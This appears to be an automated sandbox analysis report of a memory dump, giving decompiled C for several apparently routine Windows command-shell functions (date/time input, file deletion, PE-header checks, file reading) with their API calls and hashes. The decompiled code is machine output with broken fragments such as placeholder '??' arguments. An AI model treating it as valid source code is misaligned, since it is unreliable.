0x4a74824c
0x4a748252
0x4a748255
0x4a748275
0x4a748279
0x4a748279
0x4a74827a
0x4a748257
0x4a748257
0x4a74825d
0x4a748262
0x4a748265
0x4a748267
0x4a748267
0x4a748265
0x4a748255
0x4a748249
0x4a74827f
0x4a748280
0x4a748286
0x4a748287
0x4a74828d
0x4a748291
0x4a74829b
0x4a74829e
0x4a7482a1
0x4a7482a5
0x4a7482b1
0x4a7482b1
0x4a7482b3
0x00000000
0x00000000
0x4a7482b9
0x4a7482bd
0x00000000
0x00000000
0x4a7482c5
0x4a7482c8
0x4a7482c9
0x4a7482ca
0x4a7482cb
0x4a7482ce
0x4a7482cf
0x4a7482d4
0x4a7482d9
0x4a748305
0x4a74830b
0x4a74830d
0x4a748335
0x4a74833b
0x4a748341
0x4a74834a
0x4a748351
0x4a748357
0x4a748358
0x4a74835c
0x4a74835e
0x4a748374
0x4a748360
0x4a748364
0x4a748368
0x4a748368
0x00000000
0x4a74830f
0x4a74830f
0x4a748312
0x4a74831c
0x4a748321
0x4a748323
0x4a748327
0x4a748329
0x00000000
0x4a748329
0x4a748314
0x4a74831a
0x4a7482ad
0x00000000
0x4a7482ad
0x00000000
0x4a74831a
0x4a74830d
0x00000000
0x4a7482b1
0x4a73bf55
0x4a73bf5b
0x4a73bf5d
0x4a7481e9
0x4a7481ed
0x4a7481ed
0x00000000
0x4a73bf5d

APIs

Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B

iswspace.MSVCRT ref: 4A73BF65

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: iswspace
String ID:
API String ID: 2389812497-0
Opcode ID: 1ca4e143a6b3318e85a00ad9a02373369093fdca911f4035a94c5a0bc5492329
Instruction ID: 267c3bab5719ceb659c38c686d6d43d280d567eb9508c2d6655760516caa6916
Opcode Fuzzy Hash: 1ca4e143a6b3318e85a00ad9a02373369093fdca911f4035a94c5a0bc5492329
Instruction Fuzzy Hash: BA714AB1949A16EEEB70DFA0C8859AE7FBCEF59310F12401AE445DB941EB344D88C719

Uniqueness

Uniqueness Score: -1.00%

Function 4A74C53B, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 208
timeCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E4A74C53B(void* __ecx, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				char _v34;
				short _v36;
				short _v38;
				char _v40;
				char _v72;
				char _v596;
				signed int _v600;
				struct _SYSTEMTIME _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				short _t33;
				short _t34;
				short _t35;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t40;
				void* _t46;
				signed int _t48;
				signed short* _t49;
				void* _t62;
				intOrPtr* _t68;
				void* _t91;
				void* _t102;
				intOrPtr* _t103;
				signed int _t104;
				signed int _t107;
				void* _t108;

				_t91 = __ecx;
				_t31 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t31 ^ _t107;
				_t104 = _a8;
				_t103 = _a4;
				if(_t104 != 0) {
					_t33 = 0x3a;
					_v40 = _t33;
					_t34 = 0x2e;
					_v38 = _t34;
					_t35 =  *0x4a754950; // 0x0
					_v36 = _t35;
					E4A73185A( &_v34, 0xd, 0x4a754930);
				} else {
					E4A73185A( &_v40, 0x10, "/-.");
					E4A7320A9(_t104,  &_v40, 0x10, 0x4a754940);
				}
				L3:
				while(1) {
					if(_t103 == 0 ||  *_t103 == 0) {
						_t38 =  *0x4a7541d0; // 0x0
						_t39 = _t38;
						if(_t39 == 0) {
							_t40 = 0x2342;
						} else {
							if(_t39 == 0) {
								_t40 = 0x4000271d;
							} else {
								_t40 = 0x4000271e;
							}
						}
						if(_t104 != 0) {
							_push(0);
							_push(0x2343);
							E4A7399E1(_t91);
						} else {
							E4A7399E1(_t91, _t40, 1, 0x4a754940);
							_t108 = _t108 + 0xc;
						}
						_t43 =  &_v596;
						__imp___get_osfhandle( &_v596, 0x104,  &_v600);
						if(E4A7367D3(_t43, 0) == 0) {
							goto L39;
						} else {
							_t48 = _v600;
							if(_t48 == 0) {
								goto L39;
							}
							_t97 = 0;
							 *((short*)(_t107 + _t48 * 2 - 0x250)) = 0;
							_t49 =  &_v596;
							if(_v596 == 0) {
								L25:
								if(E4A733B03(_t49, _t97, 0) == 0) {
									E4A7358F3(L"%s\r\n",  &_v596);
									_pop(_t97);
								}
								goto L27;
							} else {
								goto L20;
							}
							while(1) {
								L20:
								_t97 =  *_t49 & 0x0000ffff;
								if(_t97 == 0xa || _t97 == 0xd) {
									break;
								}
								_t49 =  &(_t49[1]);
								if( *_t49 == 0) {
									goto L25;
								}
							}
							_t97 = 0;
							 *_t49 = 0;
							goto L25;
						}
					} else {
						_t68 = _t103;
						_t102 = _t68 + 2;
						do {
							_t97 =  *_t68;
							_t68 = _t68 + 2;
						} while (_t97 != 0);
						if(_t68 - _t102 >> 1 >= 0x104) {
							asm("sbb esi, esi");
							_t104 = ( ~_t104 & 0x00000003) + 0x232f;
							_push(0);
							_push(_t104);
							E4A7399E1(_t97);
							L38:
							L39:
							_t46 = 1;
							L40:
							return E4A7313A9(_t46, 0, _v8 ^ _t107, _t102, _t103, _t104);
						}
						E4A73185A( &_v596, 0x105, _t103);
						L27:
						E4A73185A( &_v72, 0x10,  &_v40);
						E4A7320A9(_t104,  &_v72, 0x10, 0x4a7338d4);
						_t103 = E4A7322CA( &_v596,  &_v72, 2);
						if( *_t103 == 0) {
							L36:
							_t46 = 0;
							goto L40;
						}
						GetLocalTime( &_v616);
						_push( &_v40);
						_push(_t103);
						_push( &_v616);
						if(_t104 != 0) {
							_t62 = E4A74C391();
						} else {
							_t62 = E4A74C245();
						}
						if(_t62 == 0) {
							L34:
							asm("sbb eax, eax");
							_push(0);
							_push(( ~_t104 & 0x00000003) + 0x232f);
							E4A7399E1(_t97);
							_pop(_t91);
							_t103 = 0;
							continue;
						} else {
							if(E4A74C21F( &_v616) != 0) {
								goto L36;
							}
							_t103 = GetLastError;
							if(GetLastError() == 0x522) {
								_push(0);
								_push(GetLastError());
								E4A736D44(_t97);
								goto L38;
							}
							goto L34;
						}
					}
				}
			}

0x4a74c53b
0x4a74c546
0x4a74c54d
0x4a74c552
0x4a74c558
0x4a74c55d
0x4a74c583
0x4a74c586
0x4a74c58a
0x4a74c58b
0x4a74c58f
0x4a74c59a
0x4a74c5a4
0x4a74c55f
0x4a74c56a
0x4a74c57a
0x4a74c57a
0x00000000
0x4a74c5a9
0x4a74c5ab
0x4a74c5e7
0x4a74c5ec
0x4a74c5ee
0x4a74c602
0x4a74c5f0
0x4a74c5f2
0x4a74c5fb
0x4a74c5f4
0x4a74c5f4
0x4a74c5f4
0x4a74c5f2
0x4a74c609
0x4a74c61d
0x4a74c61e
0x4a74c623
0x4a74c60b
0x4a74c613
0x4a74c618
0x4a74c618
0x4a74c636
0x4a74c63e
0x4a74c64d
0x00000000
0x4a74c653
0x4a74c653
0x4a74c65b
0x00000000
0x00000000
0x4a74c661
0x4a74c663
0x4a74c66b
0x4a74c678
0x4a74c697
0x4a74c69f
0x4a74c6ad
0x4a74c6b3
0x4a74c6b3
0x00000000
0x00000000
0x00000000
0x00000000
0x4a74c67a
0x4a74c67a
0x4a74c67a
0x4a74c681
0x00000000
0x00000000
0x4a74c68a
0x4a74c68e
0x00000000
0x00000000
0x4a74c690
0x4a74c692
0x4a74c694
0x00000000
0x4a74c694
0x4a74c5b2
0x4a74c5b2
0x4a74c5b4
0x4a74c5b7
0x4a74c5b7
0x4a74c5bb
0x4a74c5bc
0x4a74c5ca
0x4a74c75c
0x4a74c761
0x4a74c767
0x4a74c768
0x4a74c769
0x4a74c77d
0x4a74c77f
0x4a74c781
0x4a74c782
0x4a74c790
0x4a74c790
0x4a74c5dd
0x4a74c6b4
0x4a74c6be
0x4a74c6ce
0x4a74c6e5
0x4a74c6ea
0x4a74c770
0x4a74c770
0x00000000
0x4a74c770
0x4a74c6f7
0x4a74c700
0x4a74c701
0x4a74c708
0x4a74c70b
0x4a74c714
0x4a74c70d
0x4a74c70d
0x4a74c70d
0x4a74c71b
0x4a74c73c
0x4a74c740
0x4a74c74a
0x4a74c74b
0x4a74c74c
0x4a74c752
0x4a74c753
0x00000000
0x4a74c71d
0x4a74c72b
0x00000000
0x00000000
0x4a74c72d
0x4a74c73a
0x4a74c774
0x4a74c777
0x4a74c778
0x00000000
0x4a74c778
0x00000000
0x4a74c73a
0x4a74c71b
0x4a74c5ab

APIs

_get_osfhandle.MSVCRT ref: 4A74C63E

Part of subcall function 4A7367D3: GetFileType.KERNEL32(4A754210), ref: 4A7367DB

GetLocalTime.KERNEL32(?,?,?,00000002,?,00000010,4A7338D4,?,00000010,?,00000000,00000000), ref: 4A74C6F7
GetLastError.KERNEL32 ref: 4A74C733
GetLastError.KERNEL32(00000000), ref: 4A74C775

Strings

/-., xrefs: 4A74C55F
%s, xrefs: 4A74C6A8

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FileLocalTimeType_get_osfhandle
String ID: %s$/-.
API String ID: 2612908278-531045382
Opcode ID: 3d90c45873d935d7b37a4f071d9ea08a3cfa06ea0eb8dbdb733038f5124523e9
Instruction ID: f1fc1f803ed095e90e3d095dc9894834748e5ea9741c8fc0520926d84c67e6b6
Opcode Fuzzy Hash: 3d90c45873d935d7b37a4f071d9ea08a3cfa06ea0eb8dbdb733038f5124523e9
Instruction Fuzzy Hash: 8251D67290C119AAEB30EBA0CC99AEE7F7CEB45301F124566E602EB441E774DE4CC765

Uniqueness

Uniqueness Score: -1.00%

Function 4A73A6BE, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E4A73A6BE(void* __edx, long _a4, intOrPtr _a8, signed int* _a16) {
				signed int _v8;
				short _v532;
				short _v1056;
				char _v1057;
				signed int _v1064;
				intOrPtr _v1068;
				signed char* _v1072;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				signed int* _t63;
				signed int _t64;
				signed int _t65;
				void* _t80;
				signed int _t81;
				int _t85;
				int _t94;
				intOrPtr _t98;
				signed int _t100;
				void* _t102;
				signed char* _t103;
				char _t105;
				void* _t110;
				intOrPtr _t111;
				long _t112;
				signed int _t114;

				_t110 = __edx;
				_t61 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t61 ^ _t114;
				_t63 = _a16;
				_t112 = _a4;
				_t111 = _a8;
				_v1072 = _t63;
				_t64 =  *_t63;
				_v1064 =  *(_t111 + 2) & 0x0000ffff;
				_t105 = 0;
				_v1057 = 0;
				if((_t64 & 0x00000800) != 0) {
					_v1057 = 1;
				}
				if((_t64 & 0x00002000) != 0) {
					_t105 = 1;
				}
				_t103 = 0x106;
				if(_v1057 != 0 ||  *((char*)(_t112 + 0x11)) != 0 || _t105 != 0) {
					L7:
					if(( *(_t111 + 4) & 0x00000010) != 0) {
						L17:
						_t65 = 0;
						goto L18;
					}
					_v1064 = _t111 + 0x30 + (_v1064 & 0x0000ffff) * 2;
					if(E4A739F7B( &_v532, _t103,  *((intOrPtr*)(_t112 + 4)), _t111 + 0x30 + (_v1064 & 0x0000ffff) * 2) != 0) {
						_push(_v1064);
						goto L22;
					}
					if(E4A739F7B( &_v1056, _t103,  *((intOrPtr*)(_t112 + 4)), _t111 + 0x30) != 0) {
						E4A73185A( &_v1056, _t103,  &_v532);
					}
					if(_v1057 != 0) {
						_t80 = E4A74FE1B(_t103, _t105, _t110, _t111,  &_v1056, 0x232c, 0x2328);
						__eflags = _t80 - 1;
						if(_t80 == 1) {
							goto L11;
						}
						__eflags =  *0x4a7541b4; // 0x0
						_t65 = 0 | __eflags != 0x00000000;
						goto L18;
					} else {
						L11:
						_t103 = _v1072;
						if(( *_t103 & 0x00001000) != 0) {
							_t81 =  *(_t111 + 4);
							__eflags = _t81 & 0x00000001;
							if((_t81 & 0x00000001) == 0) {
								goto L12;
							}
							_t94 = SetFileAttributesW( &_v532, _t81 & 0xfffffffe);
							__eflags = _t94;
							if(_t94 != 0) {
								goto L12;
							}
							_push(_t94);
							_push(GetLastError());
							E4A736D44(_t105);
							goto L23;
						}
						L12:
						if(DeleteFileW( &_v1056) == 0) {
							_t85 = DeleteFileW( &_v532);
							__eflags = _t85;
							if(_t85 != 0) {
								goto L13;
							}
							_t112 = GetLastError();
							L14:
							if(_t112 != 0) {
								__eflags = _t112 - 0x4d3;
								if(_t112 == 0x4d3) {
									goto L23;
								}
								E4A7358F3(L"%s\r\n",  &_v1056);
								_push(0);
								_push(_t112);
								E4A736D44(_t105);
								goto L17;
							}
							_t103[0x60] = _t103[0x60] + 1;
							if( *0x4a754081 != 0 && ( *_t103 & 0x00000010) != 0) {
								E4A7399E1(_t105, 0x400023a1, 1,  &_v1056);
							}
							goto L17;
						}
						L13:
						_t112 = 0;
						goto L14;
					}
				} else {
					_t98 = E4A74002A(_t105,  *((intOrPtr*)(_t112 + 8)),  *((intOrPtr*)(_t112 + 0xc)));
					_v1068 = _t98;
					if(_t98 != 0) {
						_t100 = E4A739F7B( &_v532, 0x106,  *((intOrPtr*)(_t112 + 4)), _t98);
						__eflags = _t100;
						if(_t100 == 0) {
							 *((char*)(_t112 + 0x11)) = 1;
							_t102 = E4A74FE1B(0x106, _t105, _t110, _t111,  &_v532, 0x234e, 0x2328);
							__eflags = _t102 - 1;
							if(_t102 == 1) {
								goto L7;
							}
							L23:
							_t65 = 1;
							L18:
							return E4A7313A9(_t65, _t103, _v8 ^ _t114, _t110, _t111, _t112);
						}
						_push(_v1068);
						L22:
						E4A736D44(_t105, 0x400023da, 2,  *((intOrPtr*)(_t112 + 4)));
						goto L23;
					}
					goto L7;
				}
			}

0x4a73a6be
0x4a73a6c9
0x4a73a6d0
0x4a73a6d3
0x4a73a6d8
0x4a73a6dc
0x4a73a6e3
0x4a73a6e9
0x4a73a6eb
0x4a73a6f1
0x4a73a6f3
0x4a73a6ff
0x4a74a26f
0x4a74a26f
0x4a73a70a
0x4a73a70c
0x4a73a70c
0x4a73a715
0x4a73a71a
0x4a73a73f
0x4a73a743
0x4a73a7e4
0x4a73a7e4
0x00000000
0x4a73a7e4
0x4a73a758
0x4a73a76d
0x4a74a2d5
0x00000000
0x4a74a2d5
0x4a73a789
0x4a74a2ec
0x4a74a2ec
0x4a73a796
0x4a74a307
0x4a74a30c
0x4a74a30f
0x00000000
0x00000000
0x4a74a317
0x4a74a31d
0x00000000
0x4a73a79c
0x4a73a79c
0x4a73a79c
0x4a73a7a8
0x4a74a325
0x4a74a328
0x4a74a32a
0x00000000
0x00000000
0x4a74a33b
0x4a74a341
0x4a74a343
0x00000000
0x00000000
0x4a74a349
0x4a74a350
0x4a74a351
0x00000000
0x4a74a357
0x4a73a7ae
0x4a73a7bf
0x4a74a364
0x4a74a366
0x4a74a368
0x00000000
0x00000000
0x4a74a374
0x4a73a7c7
0x4a73a7c9
0x4a74a37b
0x4a74a381
0x00000000
0x00000000
0x4a74a393
0x4a74a398
0x4a74a39a
0x4a74a39b
0x00000000
0x4a74a3a0
0x4a73a7cf
0x4a73a7d9
0x4a74a3b6
0x4a74a3bb
0x00000000
0x4a73a7d9
0x4a73a7c5
0x4a73a7c5
0x00000000
0x4a73a7c5
0x4a73a726
0x4a73a72c
0x4a73a731
0x4a73a739
0x4a74a287
0x4a74a28c
0x4a74a28e
0x4a74a2c1
0x4a74a2c5
0x4a74a2ca
0x4a74a2cd
0x00000000
0x00000000
0x4a74a2a8
0x4a74a2aa
0x4a73a7e6
0x4a73a7f4
0x4a73a7f4
0x4a74a290
0x4a74a296
0x4a74a2a0
0x00000000
0x4a74a2a5
0x00000000
0x4a73a739

APIs

DeleteFileW.KERNEL32(?,?,0000232C,00002328,?,00000106,00000010,?,?,00000106,00000010,?), ref: 4A73A7BB

Strings

%s, xrefs: 4A74A38E

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: DeleteFile
String ID: %s
API String ID: 4033686569-3043279178
Opcode ID: d0f682eaba1b25c817eee59d95bfdc4d4e503f610b64c8f09aa8fa302f5d46d6
Instruction ID: 853b5d3a1c9f3a62b3d3f8508ef9384a081432f84a42c8f6bd2f5c5f49c1aa75
Opcode Fuzzy Hash: d0f682eaba1b25c817eee59d95bfdc4d4e503f610b64c8f09aa8fa302f5d46d6
Instruction Fuzzy Hash: A751E8B1D0961DAEEB71CB60CD85BEA7FBCAF05310F824495E904D6082E775DA8CCB64

Uniqueness

Uniqueness Score: -1.00%

Function 4A74D685, Relevance: 10.6, APIs: 7, Instructions: 121
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E4A74D685(void* __ebx, intOrPtr __edx, void* __esi, WCHAR* _a4) {
				signed int _v8;
				long _v12;
				char _v72;
				struct _SECURITY_ATTRIBUTES* _v76;
				void* _v80;
				char _v84;
				signed int _v88;
				char _v104;
				void* __edi;
				signed int _t26;
				WCHAR* _t28;
				struct _SECURITY_ATTRIBUTES* _t30;
				signed int _t34;
				signed int _t40;
				signed short* _t49;
				void* _t54;
				void* _t55;
				LONG* _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				signed int _t70;

				_t65 = __esi;
				_t63 = __edx;
				_t53 = __ebx;
				_t26 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t26 ^ _t70;
				_t28 = _a4;
				_t64 = 0;
				_v76 = 0;
				if(_t28 != 0) {
					_push(__ebx);
					_t54 = CreateFileW(_t28, 0x80000000, 1, 0, 3, 0x80, 0);
					_v80 = _t54;
					if(_t54 == 0xffffffff) {
						L20:
						_t30 = _v76;
						_pop(_t53);
						goto L21;
					} else {
						_push(__esi);
						_push( &_v72);
						_push(_t54);
						_t66 = 0x40;
						if(E4A74D3DB(_t66) == 0) {
							_t34 = 0;
						} else {
							_t34 = 0 | 0x00005a4d == _v72;
						}
						if(_t34 != _t64 && (0 | SetFilePointer(_t54, _v12, _t64, _t64) != 0xffffffff) != _t64) {
							_push( &_v84);
							_push(_t54);
							_t67 = 4;
							if(E4A74D3DB(_t67) == 0) {
								_t40 = 0;
							} else {
								_t40 = 0 | _v84 == 0x00004550;
							}
							if(_t40 != _t64) {
								_push( &_v104);
								_push(_t54);
								_t68 = 0x14;
								if(E4A74D3DB(_t68) != 0 && _v88 > _t64) {
									_t64 = GetProcessHeap;
									_t55 = HeapAlloc(GetProcessHeap(), 8, _v88 & 0x0000ffff);
									if(_t55 != 0) {
										if(E4A74D3DB(_v88 & 0x0000ffff, _v80, _t55) != 0) {
											_t63 = _v104;
											_t49 = E4A74D3B9(_t55, _v104);
											if(_t49 != 0) {
												_v76 =  *_t49 & 0x0000ffff;
											}
										}
										HeapFree(GetProcessHeap(), 0, _t55);
									}
								}
							}
						}
						CloseHandle(_v80);
						_pop(_t65);
						goto L20;
					}
				} else {
					_t30 = 0;
					L21:
					return E4A7313A9(_t30, _t53, _v8 ^ _t70, _t63, _t64, _t65);
				}
			}

0x4a74d685
0x4a74d685
0x4a74d685
0x4a74d68d
0x4a74d694
0x4a74d697
0x4a74d69b
0x4a74d69d
0x4a74d6a2
0x4a74d6ab
0x4a74d6c3
0x4a74d6c5
0x4a74d6cb
0x4a74d7b0
0x4a74d7b0
0x4a74d7b4
0x00000000
0x4a74d6d1
0x4a74d6d1
0x4a74d6d5
0x4a74d6d6
0x4a74d6d9
0x4a74d6e1
0x4a74d6f5
0x4a74d6e3
0x4a74d6f1
0x4a74d6f1
0x4a74d6f9
0x4a74d720
0x4a74d721
0x4a74d724
0x4a74d72c
0x4a74d73c
0x4a74d72e
0x4a74d737
0x4a74d737
0x4a74d740
0x4a74d745
0x4a74d746
0x4a74d749
0x4a74d751
0x4a74d75d
0x4a74d76f
0x4a74d773
0x4a74d784
0x4a74d786
0x4a74d78b
0x4a74d792
0x4a74d797
0x4a74d797
0x4a74d792
0x4a74d7a0
0x4a74d7a0
0x4a74d773
0x4a74d751
0x4a74d740
0x4a74d7a9
0x4a74d7af
0x00000000
0x4a74d7af
0x4a74d6a4
0x4a74d6a4
0x4a74d7b5
0x4a74d7c1
0x4a74d7c1

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 4A74D6BD
SetFilePointer.KERNEL32(00000000,?,00000000,00000000,00000000,?,?), ref: 4A74D705
GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?), ref: 4A74D766
HeapAlloc.KERNEL32(00000000), ref: 4A74D769
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 4A74D79D
HeapFree.KERNEL32(00000000), ref: 4A74D7A0
CloseHandle.KERNEL32(?), ref: 4A74D7A9

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
String ID:
API String ID: 3093239467-0
Opcode ID: 5032b11af7262d3213745f73b1b5ec5d68bae37bf5cc8e852e17ce0189c2811f
Instruction ID: 42acee38e4b84c518e2c4505c382bd015665c8abfaa3d04046fc78b4146f52a9
Opcode Fuzzy Hash: 5032b11af7262d3213745f73b1b5ec5d68bae37bf5cc8e852e17ce0189c2811f
Instruction Fuzzy Hash: 4D31C2B2604205BADB719BB5CD84EBE7FBCEB85790F118125F541DA182E670CD49C724

Uniqueness

Uniqueness Score: -1.00%

Function 4A734D9A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 119
fileCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E4A734D9A(void* _a4, short* _a8, long _a12, DWORD* _a16) {
				long _v8;
				int _v12;
				long _v16;
				int _t37;
				char* _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				int _t48;
				signed char _t50;
				char* _t57;
				int _t58;
				int _t63;

				_t57 = 0x4a756640;
				_v16 = SetFilePointer(_a4, 0, 0, 1);
				if(_a12 >= 0x1fff) {
					_a12 = 0x1fff;
				}
				 *0x4a7540f8 = 1;
				_t37 = ReadFile(_a4, 0x4a756640, _a12, _a16, 0);
				 *0x4a7540f8 = 0;
				__eflags = _t37;
				if(_t37 == 0) {
					L15:
					return 0;
				} else {
					_t40 =  *_a16;
					__eflags = _t40;
					if(__eflags == 0) {
						goto L15;
					}
					_v12 = _t40;
					_v8 = _t40;
					if(__eflags <= 0) {
						L13:
						_t58 =  *0x4a7541b8; // 0x0
						_t41 = E4A734B8D(_t58);
						asm("sbb eax, eax");
						_t44 = MultiByteToWideChar(_t58,  ~( ~_t41), 0x4a756640, _v12, _a8, _a12);
						 *_a16 = _t44;
						return _t44;
					} else {
						goto L7;
					}
					do {
						L7:
						__eflags = _v8 - 3;
						if(_v8 < 3) {
							L10:
							_t45 =  *_t57 & 0x000000ff;
							__eflags =  *(_t45 + 0x4a754e40);
							if( *(_t45 + 0x4a754e40) != 0) {
								__eflags = _v8 - 1;
								if(_v8 == 1) {
									 *0x4a7540f8 = 1;
									_t48 = ReadFile(_a4,  &(_t57[1]), 1,  &_v8, 0);
									 *0x4a7540f8 = 1;
									__eflags = _t48;
									if(_t48 == 0) {
										L23:
										 *_a16 = 0;
										goto L15;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L23;
									}
									_v12 = _v12 + 1;
									goto L13;
								}
								_v8 = _v8 - 2;
								_t57 =  &(_t57[2]);
								goto L12;
							}
							_v8 = _v8 - 1;
							_t57 =  &(_t57[1]);
							__eflags = _t57;
							goto L12;
						}
						_t50 =  *_t57;
						__eflags = _t50 - 0xa;
						if(_t50 == 0xa) {
							__eflags = _t57[1] - 0xd;
							if(_t57[1] != 0xd) {
								goto L9;
							}
							L2:
							_t57[2] = 0;
							_t63 = _t57 - 0x4a756640 + 2;
							_v12 = _t63;
							SetFilePointer(_a4, _t63 + _v16, 0, 0);
							goto L13;
						}
						L9:
						__eflags = _t50 - 0xd;
						if(_t50 == 0xd) {
							goto L1;
						}
						goto L10;
						L12:
						__eflags = _v8;
					} while (_v8 > 0);
					goto L13;
				}
				L1:
				if(_t57[1] != 0xa) {
					goto L10;
				}
				goto L2;
			}

0x4a734db3
0x4a734dbb
0x4a734dc6
0x4a734d90
0x4a734d90
0x4a734dcc
0x4a734ddd
0x4a734de3
0x4a734de9
0x4a734deb
0x4a735772
0x00000000
0x4a734df1
0x4a734df4
0x4a734df6
0x4a734df8
0x00000000
0x00000000
0x4a734dfe
0x4a734e01
0x4a734e04
0x4a734e36
0x4a734e39
0x4a734e47
0x4a734e4e
0x4a734e54
0x4a734e5d
0x00000000
0x00000000
0x00000000
0x00000000
0x4a734e06
0x4a734e06
0x4a734e06
0x4a734e0a
0x4a734e1e
0x4a734e1e
0x4a734e21
0x4a734e27
0x4a7441ea
0x4a7441ed
0x4a744205
0x4a74420a
0x4a744210
0x4a74421a
0x4a74421c
0x4a74422b
0x4a74422e
0x00000000
0x4a74422e
0x4a74421e
0x4a744221
0x00000000
0x00000000
0x4a744223
0x00000000
0x4a744223
0x4a7441ef
0x4a7441f4
0x00000000
0x4a7441f4
0x4a734e2d
0x4a734e30
0x4a734e30
0x00000000
0x4a734e30
0x4a734e0c
0x4a734e0e
0x4a734e10
0x4a735779
0x4a73577d
0x00000000
0x00000000
0x4a734be4
0x4a734be7
0x4a734bed
0x4a734bf0
0x4a734bf9
0x00000000
0x4a734bf9
0x4a734e16
0x4a734e16
0x4a734e18
0x00000000
0x00000000
0x00000000
0x4a734e31
0x4a734e31
0x4a734e31
0x00000000
0x4a734e06
0x4a734bda
0x4a734bde
0x00000000
0x00000000
0x00000000

APIs

SetFilePointer.KERNEL32(4A754210,00000000,00000000,00000001,4A76C642,4A75C640,00000000), ref: 4A734DB5
ReadFile.KERNEL32(4A754210,4A756640,00000000,?,00000000), ref: 4A734DDD
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,4A756640,4A754210,00000006,?), ref: 4A734E54

Strings

@fuJ, xrefs: 4A734DAE

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: File$ByteCharMultiPointerReadWide
String ID: @fuJ
API String ID: 2002143677-843781518
Opcode ID: 3d13968baa047eb30f3193dd5683d7c3386a9edcf578dd99804259050e32ef22
Instruction ID: f4a79f6ea90e9c2e4cb8da0972a99a0f08bf49741e9ef6a5a3b7c85fd09cc881
Opcode Fuzzy Hash: 3d13968baa047eb30f3193dd5683d7c3386a9edcf578dd99804259050e32ef22
Instruction Fuzzy Hash: D341DFB6888259FFDB71CFA0C9849AE3FB9EF06396F124069E855D3101D3308E49DB60

Uniqueness

Uniqueness Score: -1.00%

Function 4A74F354, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E4A74F354(long _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				char _v16;
				long _t29;
				void* _t31;
				signed int _t37;
				intOrPtr _t44;
				signed int _t45;
				long _t47;
				void* _t49;
				void* _t50;
				char _t52;
				intOrPtr* _t61;
				intOrPtr _t62;

				_t47 = 0;
				_v12 = 0;
				_v16 = 0;
				_t29 = E4A74FDFD(_a4, 2, 0);
				_a4 = _t29;
				if(_t29 == 0xffffffff) {
					E4A74056B(0x6e);
					L2:
					L4A74F2D7(_t49, _t47, 1);
				}
				_t61 = __imp___get_osfhandle;
				_push(_t62);
				_t62 = _a8;
				while(1) {
					_t31 =  *_t61(_a4, _a12, _a16,  &_v8, _t47);
					_pop(_t50);
					if(ReadFile(_t31, ??, ??, ??, ??) == 0) {
						break;
					}
					_t37 =  *(_t62 + 0x1c);
					_t52 = _v8;
					_a8 = _t52;
					if((_t37 & 0x0000c000) == 0) {
						if(_t52 <= 2) {
							L10:
							_t45 = _t37 | 0x00008000;
						} else {
							if( *_a12 != 0xfeff) {
								_t47 = 0;
								goto L10;
							} else {
								_t45 = _t37 | 0x00004000;
								_t47 = 0;
							}
						}
						 *(_t62 + 0x1c) = _t45;
					}
					if(_t52 != _t47) {
						asm("sbb ecx, ecx");
						_t44 = E4A74E4DC( ~(( *(_t62 + 0x1c) & 0x00008002) - 0x8002) + 1, _a12,  &_v8,  &_v16);
						_t52 = _v8;
						_v12 = _t44;
					}
					if(_t52 == _a16) {
						continue;
					}
					if(_v12 == _t47) {
						SetFilePointer( *_t61(1), _a4, _t52 - _a8, _t47);
					}
					return _a4;
				}
				 *0x4a754128 = GetLastError();
				E4A733AB3(_a4);
				_push(_t47);
				_push( *0x4a754128);
				E4A736D44(_t50);
				_pop(_t49);
				goto L2;
			}

0x4a74f35e
0x4a74f366
0x4a74f369
0x4a74f36c
0x4a74f371
0x4a74f377
0x4a74f37b
0x4a74f380
0x4a74f383
0x4a74f383
0x4a74f388
0x4a74f38e
0x4a74f38f
0x4a74f392
0x4a74f3a0
0x4a74f3a2
0x4a74f3ac
0x00000000
0x00000000
0x4a74f3b2
0x4a74f3b5
0x4a74f3b8
0x4a74f3c0
0x4a74f3c5
0x4a74f3df
0x4a74f3df
0x4a74f3c7
0x4a74f3d2
0x4a74f3dd
0x00000000
0x4a74f3d4
